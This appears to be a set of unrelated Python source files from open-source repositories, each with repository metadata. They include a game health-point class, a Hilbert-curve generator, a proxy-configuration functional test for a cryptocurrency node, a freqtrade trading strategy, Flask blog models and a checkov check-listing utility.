# coding: utf-8 from typing import List, TypeVar from obsub import event from sortedcontainers import SortedListWithKey from AbilityBag import AbilityBag from Abilities import get_ability from Ability import Ability T = TypeVar('T', bound='HealthPoint') class HealthPoint(object): def __init__(self, name : str, common_abilities : List[str], healthy_abilities : List[str], damaged_abilities : List[str]) -> None: self.name = name self._list_common_abilities = list(common_abilities) self._list_healthy_abilities = list(healthy_abilities) self._list_damaged_abilities = list(damaged_abilities) self._healthy_abilities = AbilityBag(self._list_common_abilities) self._damaged_abilities = AbilityBag(self._list_common_abilities) self._healthy_abilities.add_abilities(self._list_healthy_abilities) self._damaged_abilities.add_abilities(self._list_damaged_abilities) self.description = self.make_description() self.__is_healthy = True def _get_health(self) -> bool: return self.__is_healthy def _set_health(self, health) -> None: if self.__is_healthy != health: self.before_health_change() self.__is_healthy = health self.after_health_change() @event def before_health_change(self): pass @event def after_health_change(self): pass is_healthy = property(_get_health, _set_health) def make_description(self) -> str: healthy_description = '\n'.join(x.description for x in self._healthy_abilities.abilities() if not x.hidden) damaged_description = '\n'.join(x.description for x in self._damaged_abilities.abilities() if not x.hidden) descriptions = [] if healthy_description: descriptions.append('Healthy:\n' + healthy_description) if damaged_description: descriptions.append('Damaged:\n' + damaged_description) return '\n'.join(descriptions) def get_abilities(self) -> AbilityBag: if self.is_healthy: return self._healthy_abilities else: return self._damaged_abilities def copy(self : T) -> T: return HealthPoint(self.name, self._list_common_abilities, self._list_healthy_abilities, self._list_damaged_abilities) def __repr__(self) -> str: return "HealthPoint: {0}({1})".format(self.name, "healthy" if self.is_healthy else "damaged") def summary(self) -> str: return '[color=white]{0}({1}[color=white])'.format( self.name, "[color=green]healthy" if self.is_healthy else "[color=red]damaged")
42.676056
84
0.605941
aa0236f798ad05a959d939f9e8e08144c95297e2
2,996
py
Python
Marker5/Hilbert.py
varsheshjp/game
2a47f2099aa0538301815272f749c63aa11e6ce1
[ "MIT" ]
null
null
null
Marker5/Hilbert.py
varsheshjp/game
2a47f2099aa0538301815272f749c63aa11e6ce1
[ "MIT" ]
null
null
null
Marker5/Hilbert.py
varsheshjp/game
2a47f2099aa0538301815272f749c63aa11e6ce1
[ "MIT" ]
null
null
null
def make_mapping(m): """ Return a dictionary built up of a single mapping m rotated and flipped. The keys are 2 character strings where the first is one of [,],u,n and the second is either 'a'nticlockwise or 'c'lockwise. The values are a list of integer, tuple pair which specify how to split up the 4 quadrants and which (shape, direction) pair to apply to it. The quadrants are --------- | 0 | 1 | --------- | 2 | 3 | --------- """ quads = [0, 1, 3, 2] # quadrants in clockwise order shapes = ['u', '[', 'n', ']'] # shapes rotated clockwise rots = ['a', 'c'] # possible rotations def next(item, list, pos=1): """ Given a list and an item, reurns the item in the list pos places after the item. Wraps around the list at the boundaries """ return list[(list.index(item) + pos) % len(list)] other_direction = lambda x: next(x, rots) next_quadrant = lambda x: next(x, quads) next_shape = lambda x: next(x, shapes) def rotate(key): rotated_value = [(next_quadrant(quad), next_shape(shape) + dirn) for quad, (shape, dirn) in m[key]] shape, dirn = key return next_shape(shape) + dirn, rotated_value def flip(key): flipped_value = list(m[key]) flipped_value.reverse() flipped_value = [(quad, shape+other_direction(dirn)) for quad, (shape, dirn) in flipped_value] shape, dirn = key return shape + other_direction(dirn), flipped_value key = list(m.keys())[0] while True: key, value = rotate(key) if key in m: break m[key] = value for key in list(m.keys()): newkey, value = flip(key) m[newkey] = value return m hilbert_mapping = make_mapping( {'ua': [(0, ']c'), (2, 'ua'), (3, 'ua'), (1, '[c')]}) arrayOfPoints=[] def apply_mapping(ar, mapping, pos): """ split the 2d array ar into 4 quadrants and call apply_mapping recursively for each member of map[pos] If ar is 1x1, yield ar """ try: y, x = ar.shape[:2] except ValueError: print(ar, ar.shape) if y <= 1 and x <= 1: yield ar[0, 0, ...] else: # quad indices here are: # 0 1 # 2 3 # (nb unlike hilbert_v1!) first_half = slice(None,int( x / 2)) secnd_half = slice(int( x / 2), None) quads = [ar[first_half, first_half, ...], ar[first_half, secnd_half, ...], ar[secnd_half, first_half, ...], ar[secnd_half, secnd_half, ...]] for quadrant, newpos in mapping[pos]: for x in apply_mapping(quads[quadrant], mapping, newpos): yield x def hilbert(ar): for x in apply_mapping(ar, hilbert_mapping, 'ua'): yield x
32.215054
76
0.535714
7dedab524f481d15bafbd2edd6c272f21b058669
8,367
py
Python
test/functional/feature_proxy.py
mmontuori/quarkcoin
c4da680fd4d852e3ba835d7fd23181a8f08e47db
[ "MIT" ]
null
null
null
test/functional/feature_proxy.py
mmontuori/quarkcoin
c4da680fd4d852e3ba835d7fd23181a8f08e47db
[ "MIT" ]
12
2021-05-31T22:55:50.000Z
2021-06-04T02:30:02.000Z
test/functional/feature_proxy.py
mmontuori/quarkcoin
c4da680fd4d852e3ba835d7fd23181a8f08e47db
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2015-2018 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test monetad with different proxy configuration. Test plan: - Start monetad's with different proxy configurations - Use addnode to initiate connections - Verify that proxies are connected to, and the right connection command is given - Proxy configurations to test on monetad side: - `-proxy` (proxy everything) - `-onion` (proxy just onions) - `-proxyrandomize` Circuit randomization - Proxy configurations to test on proxy side, - support no authentication (other proxy) - support no authentication + user/pass authentication (Tor) - proxy on IPv6 - Create various proxies (as threads) - Create monetads that connect to them - Manipulate the monetads using addnode (onetry) an observe effects addnode connect to IPv4 addnode connect to IPv6 addnode connect to onion addnode connect to generic DNS name """ import socket import os from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType from test_framework.test_framework import BitcoinTestFramework from test_framework.util import ( PORT_MIN, PORT_RANGE, assert_equal, ) from test_framework.netutil import test_ipv6_local RANGE_BEGIN = PORT_MIN + 2 * PORT_RANGE # Start after p2p and rpc ports class ProxyTest(BitcoinTestFramework): def set_test_params(self): self.num_nodes = 4 self.setup_clean_chain = True def setup_nodes(self): self.have_ipv6 = test_ipv6_local() # Create two proxies on different ports # ... one unauthenticated self.conf1 = Socks5Configuration() self.conf1.addr = ('127.0.0.1', RANGE_BEGIN + (os.getpid() % 1000)) self.conf1.unauth = True self.conf1.auth = False # ... one supporting authenticated and unauthenticated (Tor) self.conf2 = Socks5Configuration() self.conf2.addr = ('127.0.0.1', RANGE_BEGIN + 1000 + (os.getpid() % 1000)) self.conf2.unauth = True self.conf2.auth = True if self.have_ipv6: # ... one on IPv6 with similar configuration self.conf3 = Socks5Configuration() self.conf3.af = socket.AF_INET6 self.conf3.addr = ('::1', RANGE_BEGIN + 2000 + (os.getpid() % 1000)) self.conf3.unauth = True self.conf3.auth = True else: self.log.warning("Testing without local IPv6 support") self.serv1 = Socks5Server(self.conf1) self.serv1.start() self.serv2 = Socks5Server(self.conf2) self.serv2.start() if self.have_ipv6: self.serv3 = Socks5Server(self.conf3) self.serv3.start() # Note: proxies are not used to connect to local nodes # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost args = [ ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'], ['-listen', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'], ['-listen', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'], [] ] if self.have_ipv6: args[3] = ['-listen', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion'] self.add_nodes(self.num_nodes, extra_args=args) self.start_nodes() def node_test(self, node, proxies, auth, test_onion=True): rv = [] # Test: outgoing IPv4 connection through node node.addnode("15.61.23.23:1234", "onetry") cmd = proxies[0].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"15.61.23.23") assert_equal(cmd.port, 1234) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if self.have_ipv6: # Test: outgoing IPv6 connection through node node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry") cmd = proxies[1].queue.get() assert(isinstance(cmd, Socks5Command)) # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6 assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"1233:3432:2434:2343:3234:2345:6546:4534") assert_equal(cmd.port, 5443) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) if test_onion: # Test: outgoing onion connection through node node.addnode("bitcoinostk4e4re.onion:9333", "onetry") cmd = proxies[2].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"bitcoinostk4e4re.onion") assert_equal(cmd.port, 9333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) # Test: outgoing DNS name connection through node node.addnode("node.noumenon:9333", "onetry") cmd = proxies[3].queue.get() assert(isinstance(cmd, Socks5Command)) assert_equal(cmd.atyp, AddressType.DOMAINNAME) assert_equal(cmd.addr, b"node.noumenon") assert_equal(cmd.port, 9333) if not auth: assert_equal(cmd.username, None) assert_equal(cmd.password, None) rv.append(cmd) return rv def run_test(self): # basic -proxy self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False) # -proxy plus -onion self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False) # -proxy plus -onion, -proxyrandomize rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True) # Check that credentials as used for -proxyrandomize connections are unique credentials = set((x.username,x.password) for x in rv) assert_equal(len(credentials), len(rv)) if self.have_ipv6: # proxy on IPv6 localhost self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False) def networks_dict(d): r = {} for x in d['networks']: r[x['name']] = x return r # test RPC getnetworkinfo n0 = networks_dict(self.nodes[0].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n0[net]['proxy_randomize_credentials'], True) assert_equal(n0['onion']['reachable'], True) n1 = networks_dict(self.nodes[1].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n1[net]['proxy_randomize_credentials'], False) assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n1['onion']['proxy_randomize_credentials'], False) assert_equal(n1['onion']['reachable'], True) n2 = networks_dict(self.nodes[2].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n2[net]['proxy_randomize_credentials'], True) assert_equal(n2['onion']['reachable'], True) if self.have_ipv6: n3 = networks_dict(self.nodes[3].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr)) assert_equal(n3[net]['proxy_randomize_credentials'], False) assert_equal(n3['onion']['reachable'], False) if __name__ == '__main__': ProxyTest().main()
41.420792
121
0.625672
19f3992a92389c4c62d27316c81136da744f2ce2
308
py
Python
xoeuf/tests/test_xoeuf_api/tests/__init__.py
merchise-autrement/xoeuf
583a0faa345480e73110d467203eefd142b0a710
[ "BSD-3-Clause" ]
3
2015-05-16T04:40:14.000Z
2016-01-26T05:36:20.000Z
xoeuf/tests/test_xoeuf_api/tests/__init__.py
merchise-autrement/xoeuf
583a0faa345480e73110d467203eefd142b0a710
[ "BSD-3-Clause" ]
null
null
null
xoeuf/tests/test_xoeuf_api/tests/__init__.py
merchise-autrement/xoeuf
583a0faa345480e73110d467203eefd142b0a710
[ "BSD-3-Clause" ]
1
2017-03-23T23:08:50.000Z
2017-03-23T23:08:50.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Copyright (c) Merchise Autrement [~º/~] and Contributors # All rights reserved. # # This is free software; you can do what the LICENCE file allows you to. # from . import test_api # noqa
30.8
72
0.525974
43109446c2af035cec1dba9aa1a3b0ac72ca68f7
1,818
py
Python
strategies/Pump.py
igolaizola/freqtrade
7475ac27c81922d39d90e1234199b1cb174c1166
[ "MIT" ]
15
2021-03-28T20:41:26.000Z
2021-07-20T11:20:11.000Z
strategies/Pump.py
igolaizola/freqtrade
7475ac27c81922d39d90e1234199b1cb174c1166
[ "MIT" ]
null
null
null
strategies/Pump.py
igolaizola/freqtrade
7475ac27c81922d39d90e1234199b1cb174c1166
[ "MIT" ]
5
2021-03-29T20:07:59.000Z
2022-02-22T22:10:57.000Z
# --- Do not remove these libs --- from freqtrade.strategy import IStrategy, merge_informative_pair from datetime import datetime, timedelta from freqtrade.persistence import Trade from pandas import DataFrame import pandas # -------------------------------- class Pump(IStrategy): """ author@: igolaizola pumps with external buy signals using /force_buy """ # Minimal ROI designed for the strategy. # adjust based on market conditions. We would recommend to keep it low for quick turn arounds # This attribute will be overridden if the config file contains "minimal_roi" minimal_roi = { "0": 0.5 } # Optimal timeframe for the strategy timeframe = '1m' # Optimal stoploss designed for the strategy stoploss = -0.10 trailing_stop = True use_custom_stoploss = True def custom_stoploss(self, pair: str, trade: 'Trade', current_time: datetime, current_rate: float, current_profit: float, **kwargs) -> float: # Make sure you have the longest interval first - these conditions are evaluated from top to bottom. if current_time - timedelta(minutes=120) > trade.open_date_utc: return -0.02 elif current_time - timedelta(minutes=60) > trade.open_date_utc: return -0.05 return -0.10 def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame: return dataframe def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame: dataframe.loc[ ( ), 'buy'] = 1 return dataframe def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame: dataframe.loc[ ( ), 'sell'] = 1 return dataframe
31.894737
108
0.638614
ceacc6af1ca867f3ffcc7847d5acabc1018b677d
172
py
Python
guitarHarmony/register.py
fuyuan-li/Guitar-Harmony
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
[ "MIT" ]
5
2020-03-15T19:09:59.000Z
2021-02-26T03:32:38.000Z
guitarHarmony/register.py
fuyuan-li/Guitar-Harmony
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
[ "MIT" ]
1
2020-03-30T06:46:17.000Z
2020-03-30T06:46:17.000Z
guitarHarmony/register.py
fuyuan-li/Guitar-Harmony
8cd836782bb19cbf39ce4a4722ea52d7988b2cc4
[ "MIT" ]
1
2020-03-30T05:59:24.000Z
2020-03-30T05:59:24.000Z
# -*- coding: utf-8 -*- # @Author: Xi He # @Date: 2020-03-21 12:34:40 # @Last Modified by: Xi He # @Last Modified time: 2020-03-21 12:36:06 from .helper import CONSTANT
28.666667
42
0.639535
0d24368ac235cc6c012368ffd0a757711cec3ceb
712
py
Python
dkeras/config/process_config.py
gndctrl2mjrtm/dkeras
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
[ "MIT" ]
195
2019-09-05T08:41:53.000Z
2022-03-09T14:04:07.000Z
dkeras/config/process_config.py
gndctrl2mjrtm/dkeras
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
[ "MIT" ]
4
2019-11-27T00:45:31.000Z
2020-03-11T14:12:44.000Z
dkeras/config/process_config.py
gndctrl2mjrtm/dkeras
97bcf176dbc96bd52cc6e19283159a6e73f0a4dc
[ "MIT" ]
14
2019-11-27T17:32:36.000Z
2022-02-12T03:55:15.000Z
#!/bin/env/python # -*- encoding: utf-8 -*- """ """ from __future__ import print_function, division import dkeras.config.config as config type_dict = { 'CPU_OVERLOAD_LIMIT': float, 'N_CPUS_PER_SERVER': int, 'N_CPUS_PER_WORKER': int } def verify_types(): """ :return: None """ local_vars = list(locals().keys()) config_vars = dir(config) for v_name in type_dict.keys(): var = config.__dict__[v_name] if not isinstance(var, type_dict[v_name]): raise TypeError( "Config variable should be type: {}, not type: {}".format( type_dict[v], type(var).__name__)) if __name__ == "__main__": verify_types()
20.342857
74
0.599719
43a7e5b1d304bab2f4e750abab66ec03ecf1d69d
4,344
py
Python
venv/lib/python3.7/site-packages/telegram/ext/choseninlineresulthandler.py
danigfavero/ada
3c3842023c22510eedf207b23c418f22389622aa
[ "MIT" ]
1
2021-08-20T05:43:20.000Z
2021-08-20T05:43:20.000Z
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
assaufianggie/VerraBot
cbe46ccb219c2972871e760268b427e1f8e79f93
[ "MIT" ]
5
2021-03-31T19:34:39.000Z
2021-12-13T20:29:07.000Z
venv/lib/python3.6/site-packages/telegram/ext/choseninlineresulthandler.py
assaufianggie/VerraBot
cbe46ccb219c2972871e760268b427e1f8e79f93
[ "MIT" ]
1
2020-09-02T07:24:59.000Z
2020-09-02T07:24:59.000Z
#!/usr/bin/env python # # A library that provides a Python interface to the Telegram Bot API # Copyright (C) 2015-2018 # Leandro Toledo de Souza <devs@python-telegram-bot.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser Public License for more details. # # You should have received a copy of the GNU Lesser Public License # along with this program. If not, see [http://www.gnu.org/licenses/]. """This module contains the ChosenInlineResultHandler class.""" from telegram import Update from .handler import Handler class ChosenInlineResultHandler(Handler): """Handler class to handle Telegram updates that contain a chosen inline result. Attributes: callback (:obj:`callable`): The callback function for this handler. pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be passed to the callback function. pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to the callback function. pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to the callback function. pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to the callback function. Note: :attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a ``dict`` you can use to keep any data in will be sent to the :attr:`callback` function. Related to either the user or the chat that the update was sent in. For each update from the same user or in the same chat, it will be the same ``dict``. Note that this is DEPRECATED, and you should use context based callbacks. See https://git.io/fxJuV for more info. Args: callback (:obj:`callable`): The callback function for this handler. Will be called when :attr:`check_update` has determined that an update should be processed by this handler. Callback signature for context based API: ``def callback(update: Update, context: CallbackContext)`` The return value of the callback is usually ignored except for the special case of :class:`telegram.ext.ConversationHandler`. pass_update_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called ``update_queue`` will be passed to the callback function. It will be the ``Queue`` instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher` that contains new updates which can be used to insert updates. Default is ``False``. DEPRECATED: Please switch to context based callbacks. pass_job_queue (:obj:`bool`, optional): If set to ``True``, a keyword argument called ``job_queue`` will be passed to the callback function. It will be a :class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater` which can be used to schedule new jobs. Default is ``False``. DEPRECATED: Please switch to context based callbacks. pass_user_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called ``user_data`` will be passed to the callback function. Default is ``False``. DEPRECATED: Please switch to context based callbacks. pass_chat_data (:obj:`bool`, optional): If set to ``True``, a keyword argument called ``chat_data`` will be passed to the callback function. Default is ``False``. DEPRECATED: Please switch to context based callbacks. """ def check_update(self, update): """Determines whether an update should be passed to this handlers :attr:`callback`. Args: update (:class:`telegram.Update`): Incoming telegram update. Returns: :obj:`bool` """ return isinstance(update, Update) and update.chosen_inline_result
49.931034
99
0.683702
a6d3574085f276b565fe3d9b7dfcec63e52b2ab7
1,662
py
Python
flaskblog/models.py
oecorrechag/ProyectoM
e21acfc44c566e9030b2931c7b450da9bcc1b19d
[ "MIT" ]
null
null
null
flaskblog/models.py
oecorrechag/ProyectoM
e21acfc44c566e9030b2931c7b450da9bcc1b19d
[ "MIT" ]
null
null
null
flaskblog/models.py
oecorrechag/ProyectoM
e21acfc44c566e9030b2931c7b450da9bcc1b19d
[ "MIT" ]
null
null
null
from datetime import datetime from itsdangerous import TimedJSONWebSignatureSerializer as Serializer from flask import current_app from flaskblog import db, login_manager from flask_login import UserMixin @login_manager.user_loader def load_user(user_id): return User.query.get(int(user_id)) class User(db.Model, UserMixin): id = db.Column(db.Integer, primary_key=True) username = db.Column(db.String(20), unique=True, nullable=False) email = db.Column(db.String(120), unique=True, nullable=False) image_file = db.Column(db.String(20), nullable=False, default='default.jpg') password = db.Column(db.String(60), nullable=False) posts = db.relationship('Post', backref='author', lazy=True) def get_reset_token(self, expires_sec=1800): s = Serializer(app.config['SECRET_KEY'], expires_sec) return s.dumps({'user_id': self.id}).decode('utf-8') @staticmethod def verify_reset_token(token): s = Serializer(app.config['SECRET_KEY']) try: user_id = s.loads(token)['user_id'] except: return None return User.query.get(user_id) def __repr__(self): return f"User('{self.username}', '{self.email}', '{self.image_file}')" class Post(db.Model): id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(100), nullable=False) date_posted = db.Column(db.DateTime, nullable=False, default=datetime.utcnow) content = db.Column(db.Text, nullable=False) user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False) def __repr__(self): return f"Post('{self.title}', '{self.date_posted}')"
35.361702
81
0.690734
3f02ff84a26d33492b748b602335c14e59efc7ee
5,753
py
Python
checkov/common/util/docs_generator.py
jamesholland-uk/checkov
d73fd4bd7096d48ab3434a92a177bcc55605460a
[ "Apache-2.0" ]
null
null
null
checkov/common/util/docs_generator.py
jamesholland-uk/checkov
d73fd4bd7096d48ab3434a92a177bcc55605460a
[ "Apache-2.0" ]
null
null
null
checkov/common/util/docs_generator.py
jamesholland-uk/checkov
d73fd4bd7096d48ab3434a92a177bcc55605460a
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python import re from typing import List, Optional, Tuple, Union from tabulate import tabulate from checkov.arm.registry import arm_resource_registry, arm_parameter_registry from checkov.bicep.checks.param.registry import registry as bicep_param_registry from checkov.bicep.checks.resource.registry import registry as bicep_resource_registry from checkov.bitbucket.registry import registry as bitbucket_configuration_registry from checkov.cloudformation.checks.resource.registry import cfn_registry as cfn_registry from checkov.common.checks.base_check_registry import BaseCheckRegistry from checkov.common.checks_infra.registry import BaseRegistry as BaseGraphRegistry, get_graph_checks_registry from checkov.dockerfile.registry import registry as dockerfile_registry from checkov.github.registry import registry as github_configuration_registry from checkov.github_actions.checks.job_registry import registry as github_actions_jobs_registry from checkov.gitlab.registry import registry as gitlab_configuration_registry from checkov.kubernetes.checks.resource.registry import registry as k8_registry from checkov.secrets.runner import CHECK_ID_TO_SECRET_TYPE from checkov.serverless.registry import sls_registry from checkov.terraform.checks.data.registry import data_registry from checkov.terraform.checks.module.registry import module_registry from checkov.terraform.checks.provider.registry import provider_registry from checkov.terraform.checks.resource.registry import resource_registry ID_PARTS_PATTERN = re.compile(r'([^_]*)_([^_]*)_(\d+)') def get_compare_key(c): res = [] for match in ID_PARTS_PATTERN.finditer(c[0]): ckv, framework, number = match.groups() numeric_value = int(number) if number else 0 # count number of leading zeros same_number_ordering = len(number) - len(number.lstrip('0')) res.append((framework, ckv, numeric_value, same_number_ordering, c[2])) return res def print_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> None: framework_list = frameworks if frameworks else ["all"] printable_checks_list = get_checks(framework_list, use_bc_ids=use_bc_ids) print( tabulate(printable_checks_list, headers=["Id", "Type", "Entity", "Policy", "IaC"], tablefmt="github", showindex=True)) print("\n\n---\n\n") def get_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False) -> \ List[Tuple[str, str, str, str, str]]: framework_list = frameworks if frameworks else ["all"] printable_checks_list = [] def add_from_repository(registry: Union[BaseCheckRegistry, BaseGraphRegistry], checked_type: str, iac: str) -> None: nonlocal printable_checks_list if isinstance(registry, BaseCheckRegistry): for entity, check in registry.all_checks(): printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, entity, check.name, iac)) elif isinstance(registry, BaseGraphRegistry): for check in registry.checks: for rt in check.resource_types: printable_checks_list.append((check.get_output_id(use_bc_ids), checked_type, rt, check.name, iac)) if any(x in framework_list for x in ("all", "terraform")): add_from_repository(resource_registry, "resource", "Terraform") add_from_repository(data_registry, "data", "Terraform") add_from_repository(provider_registry, "provider", "Terraform") add_from_repository(module_registry, "module", "Terraform") graph_registry = get_graph_checks_registry("terraform") graph_registry.load_checks() add_from_repository(graph_registry, "resource", "Terraform") if any(x in framework_list for x in ("all", "cloudformation")): add_from_repository(cfn_registry, "resource", "Cloudformation") if any(x in framework_list for x in ("all", "kubernetes")): add_from_repository(k8_registry, "resource", "Kubernetes") if any(x in framework_list for x in ("all", "serverless")): add_from_repository(sls_registry, "resource", "serverless") if any(x in framework_list for x in ("all", "dockerfile")): add_from_repository(dockerfile_registry, "dockerfile", "dockerfile") if any(x in framework_list for x in ("all", "github_configuration")): add_from_repository(github_configuration_registry, "github_configuration", "github_configuration") if any(x in framework_list for x in ("all", "github_actions")): add_from_repository(github_actions_jobs_registry, "jobs", "github_actions") if any(x in framework_list for x in ("all", "gitlab_configuration")): add_from_repository(gitlab_configuration_registry, "gitlab_configuration", "gitlab_configuration") if any(x in framework_list for x in ("all", "bitbucket_configuration")): add_from_repository(bitbucket_configuration_registry, "bitbucket_configuration", "bitbucket_configuration") if any(x in framework_list for x in ("all", "arm")): add_from_repository(arm_resource_registry, "resource", "arm") add_from_repository(arm_parameter_registry, "parameter", "arm") if any(x in framework_list for x in ("all", "bicep")): add_from_repository(bicep_param_registry, "parameter", "Bicep") add_from_repository(bicep_resource_registry, "resource", "Bicep") if any(x in framework_list for x in ("all", "secrets")): for check_id, check_type in CHECK_ID_TO_SECRET_TYPE.items(): printable_checks_list.append((check_id, check_type, "secrets", check_type, "secrets")) return sorted(printable_checks_list, key=get_compare_key) if __name__ == '__main__': print_checks()
55.317308
120
0.746046
f8b0b35c09c785b08cc76fff5d91f8b138396f08
982
py
Python
tests/test_json.py
JoshKarpel/iax
3f28ba2f94eb373b02ea080955f33681c951578c
[ "MIT" ]
null
null
null
tests/test_json.py
JoshKarpel/iax
3f28ba2f94eb373b02ea080955f33681c951578c
[ "MIT" ]
null
null
null
tests/test_json.py
JoshKarpel/iax
3f28ba2f94eb373b02ea080955f33681c951578c
[ "MIT" ]
null
null
null
import datetime import random import pytest from ix import ix def test_to_jsons(): @ix class JSON: a: int b: float d: str e: bool jsons = [ JSON(0, 1.8, 'hi', True), JSON(2, 5.3, 'lo', False), JSON(-10, -4.2, 'foo', True), ] expected = '[{"a": 0, "b": 1.8, "d": "hi", "e": true}, {"a": 2, "b": 5.3, "d": "lo", "e": false}, {"a": -10, "b": -4.2, "d": "foo", "e": true}]' assert JSON.to_jsons(jsons) == expected def test_nested_to_jsons(): @ix class Inner: a: int @ix class Outer: inner: Inner obj = [Outer(Inner(5))] expected = '[{"inner": {"a": 5}}]' assert Outer.to_jsons(obj) == expected def test_load_nested_jsons(): @ix class Inner: a: int @ix class Outer: inner: Inner obj = [Outer(Inner(5))] jsons = Outer.to_jsons(obj) loaded = list(Outer.from_jsons(jsons)) assert loaded[0] == obj[0]
16.931034
148
0.5
b3ddffb8f2869b82f5a9c1b1b8c9bb343758e5f4
857
py
Python
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
kristapratico/azure-cli
00d4ce5caed40758d4a13c428a28583d10c155cf
[ "MIT" ]
null
null
null
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
kristapratico/azure-cli
00d4ce5caed40758d4a13c428a28583d10c155cf
[ "MIT" ]
null
null
null
src/command_modules/azure-cli-configure/azure/cli/command_modules/configure/commands.py
kristapratico/azure-cli
00d4ce5caed40758d4a13c428a28583d10c155cf
[ "MIT" ]
null
null
null
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from azure.cli.core.commands import CliCommandType def load_command_table(self, _): configure_custom = CliCommandType(operations_tmpl='azure.cli.command_modules.configure.custom#{}') with self.command_group('', configure_custom) as g: g.command('configure', 'handle_configure') with self.command_group('cache', configure_custom) as g: g.command('list', 'list_cache_contents') g.command('show', 'show_cache_contents') g.command('delete', 'delete_cache_contents')
42.85
102
0.572929
71fa1053686b34be41af7c3ac5cc774b88081e14
4,036
py
Python
benchmark/startQiskit_noisy1011.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
benchmark/startQiskit_noisy1011.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
benchmark/startQiskit_noisy1011.py
UCLA-SEAL/QDiff
d968cbc47fe926b7f88b4adf10490f1edd6f8819
[ "BSD-3-Clause" ]
null
null
null
